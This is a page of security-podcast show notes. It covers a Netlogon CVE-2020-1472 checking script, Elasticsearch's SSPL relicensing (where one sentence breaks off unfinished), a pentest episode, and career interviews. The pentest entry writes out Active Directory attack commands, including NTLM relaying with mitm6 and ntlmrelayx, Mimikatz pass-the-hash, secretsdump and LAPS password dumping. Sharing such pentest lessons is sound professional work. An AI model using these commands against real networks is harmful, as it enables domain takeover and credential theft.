2021-002 - Elasticsearch license changes, Secure RPC patching for Windows, IronKey traps man's $270 million in Bitcoin
47 min

 

Secure RPC issue (Netlogon secure channel, CVE-2020-1472)

Netlogon Domain Controller Enforcement Mode is enabled by default beginning with the February 9, 2021 Security Update, related to CVE-2020-1472 – Microsoft Security Response Center

How to manage the changes in Netlogon secure channel connections associated with CVE-2020-1472 (microsoft.com)
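
As an added example that is not part of the episode notes or of Microsoft's articles linked above, this is the check I would run on each domain controller around the February 9, 2021 update. It reads the FullSecureChannelProtection registry value and summarises the Netlogon event IDs Microsoft documented for CVE-2020-1472: 5827 and 5828 for denied vulnerable connections (machine and trust accounts), 5829 for vulnerable connections allowed during the initial deployment phase, and 5830 and 5831 for connections allowed by the "Allow vulnerable Netlogon secure channel connections" group policy exception. The 90-day look-back and the assumption that the offending account name is the first insertion string of each event are mine; confirm the latter against the Message text of one event on your own DCs.

```powershell
# Added example (not from the episode notes or from Microsoft's KB article).
# Run elevated on each domain controller. It answers two questions:
#   1. Is Netlogon enforcement mode on?  (registry value FullSecureChannelProtection)
#   2. Which accounts are still making vulnerable Netlogon secure channel connections?
#      (System log, provider NETLOGON, event IDs 5827-5831 documented for CVE-2020-1472)

$regPath = 'HKLM:\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters'
$fscp = (Get-ItemProperty -Path $regPath -Name FullSecureChannelProtection -ErrorAction SilentlyContinue).FullSecureChannelProtection
if ($fscp -eq 1) {
    'FullSecureChannelProtection = 1: enforcement mode was opted into ahead of the February 2021 update'
} elseif ($fscp -eq 0) {
    'FullSecureChannelProtection = 0: the pre-February-2021 opt-out; enforcement is on regardless once the February 9, 2021 update is installed, so do not rely on this'
} else {
    'FullSecureChannelProtection not set: enforcement mode is on by default with the February 9, 2021 update'
}

# What each event ID means, per Microsoft's guidance for CVE-2020-1472
$meaning = @{
    5827 = 'DENIED  - vulnerable connection from a machine account'
    5828 = 'DENIED  - vulnerable connection from a trust account'
    5829 = 'ALLOWED - only during the initial deployment phase; denied under enforcement'
    5830 = 'ALLOWED - machine account listed in the "Allow vulnerable Netlogon secure channel connections" policy'
    5831 = 'ALLOWED - trust account listed in the "Allow vulnerable Netlogon secure channel connections" policy'
}

$since = (Get-Date).AddDays(-90)   # look-back window is an assumption; match it to your log retention
$events = @(Get-WinEvent -FilterHashtable @{
        LogName      = 'System'
        ProviderName = 'NETLOGON'
        Id           = 5827, 5828, 5829, 5830, 5831
        StartTime    = $since
    } -ErrorAction SilentlyContinue)

if ($events.Count -eq 0) {
    "No Netlogon vulnerable-connection events (5827-5831) since $since on $env:COMPUTERNAME"
    return
}

$rows = foreach ($e in $events) {
    # Assumption: the SamAccountName of the offending account is the first insertion string.
    # Check one event's Message text on your own DCs before trusting this column.
    $account = if ($e.Properties.Count -gt 0) { $e.Properties[0].Value } else { '<unparsed>' }
    [pscustomobject]@{
        EventId = $e.Id
        Meaning = $meaning[$e.Id]
        Account = $account
        Time    = $e.TimeCreated
    }
}

# One line per (event ID, account) with a count and the most recent occurrence, so the
# accounts that will break (5829) or already broke (5827/5828) under enforcement stand out.
$rows | Group-Object EventId, Account | ForEach-Object {
    $first = $_.Group[0]
    [pscustomobject]@{
        EventId  = $first.EventId
        Account  = $first.Account
        Count    = $_.Count
        LastSeen = ($_.Group | Sort-Object Time -Descending | Select-Object -First 1).Time
        Meaning  = $first.Meaning
    }
} | Sort-Object EventId, @{ Expression = 'Count'; Descending = $true } | Format-Table -AutoSize
```

Run it on every DC, not just one, because each DC only logs the connections it served. A 5829 entry means that device will stop authenticating when enforcement lands; 5827/5828 means it already has. The fix is to update the device (or get a fixed Netlogon client from its vendor); the group policy exception that produces 5830/5831 is meant as a temporary carve-out, so anything still showing up there is a finding.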

Elasticsearch and Kibana license change (SSPL)

https://anonymoushash.vmbrasseur.com/2021/01/14/elasticsearch-and-kibana-are-now-business-risks

“There are those who will point to the FAQ for the SSPL and claim that the license isn’t interpreted in that way because the FAQ says so. Unfortunately, when you agree to a license you are agreeing to the text of that license document and not to a FAQ. If the text of that license document is ambiguous, then so are your rights and responsibilities under that license. Should your compliance to that license come before a judge, it’s their interpretation of those rights and responsibilities that will hold sway. This ambiguity puts your organisation at risk.”

Doubling down on open, Part II | Elastic Blog - Elastic's announcement of the license change affecting Elasticsearch and Kibana

MongoDB did something similar in 2018: mjg59 | Initial thoughts on MongoDB's new Server Side Public License (dreamwidth.org)  

Hacker News Discussion: MongoDB switches up its open source license | Hacker News (ycombinator.com)

@vmbrasseur: VM (Vicky) Brasseur on Twitter: "With today's relicensing to #SSPL, Elasticsearch & Kibana are no longer #OpenSource but are instead business risks: https://t.co/XNx2EMLNfH" / Twitter

Adam Jacob on Twitter: "Yeah, come on - how can this be "doubling down on open"? Some true duplicity here. https://t.co/rlJVnLxYwP - we're taking two widely used, widely distributed, widely incorporated open source projects and making them no longer open source. But we're doubling down on open!" / Twitter

[License-review] Approval: Server Side Public License, Version 2 (SSPL v2) (opensource.org)

“We continue to believe that the SSPL complies with the Open Source Definition and the four essential software freedoms. However, based on its reception by the members of this list and the greater open source community, the community consensus required to support OSI approval does not currently appear to exist regarding the copyleft provision of SSPL. Thus, in order to be respectful of the time and efforts of the OSI board and this list’s members, we are hereby withdrawing the SSPL from OSI consideration.”

(MongoDB's position was that the SSPL could still qualify as open source, but negative feedback on the license-review list and elsewhere led them to withdraw it from OSI consideration, so it has never been OSI-approved)

Open Source license requirements: The Open Source Definition | Open Source Initiative

What does this mean? 

If you have products that utilize Elasticsearch, Kibana or MongoDB in some way, talk to your legal team to find out whether you need to divest your org from them. The SSPL is not an 'open source' license under the OSI definition linked above; it is 'source available'. Two things are worth establishing before that conversation: which versions you actually run, because the Elastic relicense applies to Elasticsearch and Kibana 7.11 and later (the earlier Apache 2.0 releases stay Apache 2.0), and whether you offer the software to third parties as a service, because that is what triggers the SSPL's contentious Section 13 obligations, and the ambiguity about how far those reach is the business risk quoted above. Note also that Elastic's new releases are dual licensed under the SSPL and the Elastic License, so there is a second set of terms to evaluate.

It might not affect your organization, and moving to SSPL might be feasible. If your product makes any changes internally to Elasticsearch,

Notable links

JTNYDV - specifically the CIS Docker hardening

Twitter: @jtnydv

Bug Detected in Linux Mint Virtual Keyboard by Two Kids - E Hacking News - Latest Hacker News and IT Security News

https://www.bleepingcomputer.com/news/microsoft/microsoft-sysmon-now-detects-malware-process-tampering-attempts/

https://www.coindesk.com/anchorage-becomes-first-occ-approved-national-crypto-bank

https://www.cnn.com/2021/01/15/uk/bitcoin-trash-landfill-gbr-scli-intl/index.html

https://www.techradar.com/news/man-has-two-attempts-left-to-unlock-bitcoin-wallet-worth-dollar270-million

https://www.linkedin.com/posts/amandaberlin_podcast-mentalhealth-neurodiversity-activity-6755910847148691456-Lms5

https://www.linkedin.com/posts/amandaberlin_swag-securitybreach-infosecurity-activity-6755884694501498880-yAck

 

Check out our Store on Teepub! https://brakesec.com/store

Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email bds.podcast@gmail.com

#AmazonMusic: https://brakesec.com/amazonmusic 

#Brakesec Store!: https://brakesec.com/teepub 

#Spotify: https://brakesec.com/spotifyBDS #Pandora: https://brakesec.com/pandora 

#RSS: https://brakesec.com/BrakesecRSS

#Youtube Channel:  http://www.youtube.com/c/BDSPodcast

#iTunes Store Link: https://brakesec.com/BDSiTunes

#Google Play Store: https://brakesec.com/BDS-GooglePlay

Our main site:  https://brakesec.com/bdswebsite

#iHeartRadio App:  https://brakesec.com/iHeartBrakesec

#SoundCloud: https://brakesec.com/SoundcloudBrakesec

Comments, Questions, Feedback: bds.podcast@gmail.com

Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon

https://brakesec.com/BDSPatreon

#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir

#Player.FM : https://brakesec.com/BDS-PlayerFM

#Stitcher Network: https://brakesec.com/BrakeSecStitcher

#TuneIn Radio App: https://brakesec.com/TuneInBrakesec

7 Minute Security
Brian Johnson
7MS #455: Tales of Internal Network Pentest Pwnage - Part 24
Hey everybody! Sorry that we're late again with today's episode, but I got COVID shot #2 and it kicked my behind BIG TIME today. But I'm vertical today and back amongst the living and thrilled to be sharing with you another tale of pentest pwnage! Yeah! This might be my favorite tale yet because:

* I got to use some of my new CRTP skills!
* Make sure on your pentests that you're looking for "roastable" users. Harmj0y has a great article on this, but the TLDR is make sure you run PowerView with the -PreauthNotRequired flag to hunt for these users: Get-DomainUser -PreauthNotRequired
* Check for misconfigured LAPS installs with Get-LAPSPasswords!
* The combination of mitm6.py -i eth0 -d company.local --no-ra --ignore-nofqdn + ntlmrelayx -t ldaps://domain.controller.ip.address -wh attacker-wpad --delegate-access is reeeeeealllllyyyyyyy awesome and effective!
* When you are doing the --delegate-access trick, don't ignore (like I did for years) if you get administrative impersonation access on a regular workstation. You can still abuse it by impersonating an admin, run secretsdump or pilfer the machine for additional goodies!
* SharpShares is a cool way to find shares your account has access to.
* I didn't get to use it on this engagement but Chisel looks to be a rad way to tunnel information.
* Once you've dumped all the domain hashes with secretsdump, don't forget (like me) that you can do some nice Mimikatz'ing to leverage those hashes! For example: sekurlsa::pth /user:administrator /ntlm:hash-of-the-administrator-user /domain:yourdomain.com Do that and bam! a new command prompt opens with administrator privileges! Keep in mind though, if you do a whoami you will still be SOMEWORKSTATION\joeblo, but you can do something like psexec \\VICTIM-SERVER cmd.exe and then do a whoami and then POW! - you're running as domain admin!
* Once you've got domain admin access, why not run Get-LAPSPasswords again to get all the local admin passwords across the whole enterprise? Or you can do get-netcomputer VICTIM-SERVER and look for the ms-Mcs-AdmPwd value - which is the LAPS password! Whooee!!! That's fun!
* Armed with all the local admin passwords, I was able to run net use Q: "\\VICTIM-SERVER\C$" /user:Administrator LAPS-PASSWORD to hook a network drive to that share. You can also do net view \\VICTIM-SERVER\ to see all the shares you can hook to. And that gave me all the info I needed to find the company's crown jewels :-)
52 min
CISO-Security Vendor Relationship Podcast
Mike Johnson and David Spark
Would You Look at that Unrealistic Licensing Deal?
All links and images for this episode can be found on CISO Series https://cisoseries.com/would-you-look-at-that-unrealistic-licensing-deal/

CISOs know that salespeople want to make the best licensing deal they can possibly get. But unpredictability in the world of cybersecurity makes one-year licensing deals tough, and three-year licensing deals impossible.

This episode is hosted by David Spark (@dspark), producer of CISO Series and Mike Johnson. Our guest this week is Mark Eggleston (@meggleston), CISO, Health Partners Plans. This recording was recorded live in front of a virtual audience at the "SecTalks - Leading with grit in security" virtual conference brought to you by our sponsor, Cobalt.

Thanks to our podcast sponsor, Cobalt

Cobalt offers a faster more effective pentesting solution through its Pentest as a Service (PtaaS) platform. With it, you can schedule a pentest in as little as 24 hours for all kinds of assets. The platform also connects you with a global pool of pentesters called the Cobalt Core, whose skills can match what you need. And instead of sending you a huge PDF that raises more questions you can’t answer, they engage with your team throughout the pentest. Findings can land straight into Jira and GitHub, helping you fix vulnerabilities as soon as they’re discovered. Cobalt makes pentesting easy, quick to deploy, scalable, and simple to remediate.

On this week's episode

Why is everybody talking about this now?
A redditor is struggling and overwhelmed! The person is in school studying, working, and loving cybersecurity, but has completely and utterly failed the foundations course and is on academic probation. The person told their story to the cybersecurity subreddit community, and the support came out in droves. We've seen this before. People hit a major wall professionally and they just reach out to the anonymous masses for support. The story hits a nerve and the community is eager to show encouragement. In fact, just this past week, the New York Times had an article about the unemployment subreddit offering advice and information to those struggling. We'll take a look at this tactic of reaching out for support and guidance through discussion boards.

What do you think of this vendor marketing tactic?
"Pro tip to vendors: don’t claim that you can’t do a one-year licensing deal. You might end up with a zero-year license deal", said Ian Amit, CSO, Cimpress on LinkedIn. We'll look at the art of negotiating a contract with a vendor: What is it ultimately you want? What are you willing to concede on and what must you have? And what are the situations that cause this to change?

It's time to play, "What's Worse?!"
Jason Dance of Greenwich Associates suggests two scenarios that others believe are security, but actually aren't.

If you haven’t made this mistake, you’re not in security
On Twitter, the CISO of Twitter, Rinki Sethi, said, "A career mistake I made, I rolled out a phishing testing program before the company was ready for it. The HR team said it was against the company culture and if I tried a trick like that again, I would be fired. Lesson - communication is important in #cybersecurity." Rinki asked for others' stories of failure. Let's explore a few.

What Is It and Why Do I Care?
For this week's game, the topic is vulnerability management. We look at four pitches from four different vendors. Contestants must first answer what "vulnerability management" is in 25 words or less, and secondly must explain what's unique about their vulnerability management solution. These are based on actual pitches - company names and individual identities are hidden. The winners will be revealed at the end.
38 min
Getting Into Infosec
Ayman Elsawah (@coffeewithayman)
Dr. Eric Cole - Accidental CIA Hacker To Fortune 500 Security Advisory To Entrepreneur
Dr. Eric Cole is an accomplished cybersecurity hacker and executive advisor. His career has been a mix of sixth-sense chance encounters and wisdom/foresight of the future. His uncanny ability to see the opportunity in cybersecurity combined with the wisdom to listen to those smarter than him is why he is where he is today. His interview is chock full of poignant advice and tips. Dr. Eric Cole also has a creative side to him: he's a musician. He was a French horn player before and now, he's a drummer. He's known as the Tommy Lee of Cybersecurity.

Eric Cole's Quick List of Advice
* Always be respectful. Don't be an A**Hole to other people… but don't give a crap what other people say or think because we're unique and different. If you're an entrepreneur in cybersecurity, they're not gonna get ya.
* Listen to people that are smarter than you and have made the mistakes before you make them.
* Life will force you to repeat lessons until you learn them.
* The biggest gap is in the monitoring, detection, and analyst side.

Quotes
"It's all about looking at calculated risk, understanding [the] pros and cons, and taking chances."
"You've done the same thing six times in a row, and it doesn't work. What makes you think if you do it a seventh time [that] it's actually going to work?"
"Try different things."
"Have advisory board members for your life."
"If the best professionals in the world have coaches, why shouldn't we?"
"If people are not listening to your advice, 99% of the time, it's because you didn't answer the right question."
"Smart people know the right answer. Brilliant people ask the right question."
"Good cybersecurity people solve problems. Great cybersecurity people solve the right problems."
"Don't overlook the obvious."
"It's never a lack of resources, but a lack of resourcefulness."

Getting Into Infosec
Other episodes, transcripts, a career guide to Getting Into Infosec: https://gettingintoinfosec.com/

See omnystudio.com/listener for privacy information.
49 min
Hacker Valley Studio
Hacker Valley Media
We Are Here Finale: Rep. Yvette Clarke
Hacker Valley Studio presents: We Are Here - an audio journey and series exploring black excellence in technology and cybersecurity. In part three of this series, Ron and Chris interview Congresswoman Yvette Clarke, serving as the U.S. Representative for New York's 9th congressional district since 2013.

Congresswoman Clarke’s parents immigrated to Brooklyn, New York in the 1950s from Jamaica. Being born from immigrant parents and witnessing the transformation of the country during the civil rights movement helped shape her worldview. Congresswoman Clarke mentions that the nurture from her family and community sparked her interest in public service at an early age. Congresswoman Clarke recalls being a child and looking up to her pediatrician, Dr. Thompson. Congresswoman Clarke could see herself being like Dr. Thompson and that led her to pursue her interests in STEM in grade school and college. When Congresswoman Clarke went away to college she made a commitment to come back to Brooklyn and use her education to help others.

As the episode progresses, Congresswoman Clarke mentions her parents were engaged in the community out of necessity. They wanted to be able to navigate the United States and create community for her and her brother. Congresswoman Clarke’s mother started her community outreach at Parent Teacher Association meetings and was encouraged to run for political office after some time. In fact, Congresswoman Clarke became the first and only child to succeed a parent in political office.

Congresswoman Clarke describes community as essential and building communities is done through education. Digital transformation has enabled all generations to collaborate on common causes that they previously wouldn’t have had the opportunity to. An example that Congresswoman Clarke provides is narrowing the education gap for children of color. Through technology, parents have been working with government agencies and private organizations to provide more resources to schools in need.

Impactful Moments:
0:00 - Hacker Valley Studio presents We Are Here Pt 3
0:52 - Congresswoman Yvette Clarke on Hacker Valley Studio!
1:56 - Early life and how Congresswoman Clarke made it into office
3:38 - What inspired Congresswoman Clarke to help others
7:21 - Surprises while in office and servicing the public
13:35 - Congresswoman Clarke’s story of perseverance
16:36 - The importance of community and how to influence yours
24:40 - Education and mentorship
27:51 - Using technology to course correct and amplify your voice
31:59 - Sage wisdom for embarking on your personal journey

Follow Congresswoman Yvette Clarke on LinkedIn, Instagram, and Twitter. Learn more about Hacker Valley Studio. Support Hacker Valley Studio on Patreon. Follow Hacker Valley Studio on Twitter. Follow hosts Ron Eddings and Chris Cochran on Twitter.
37 min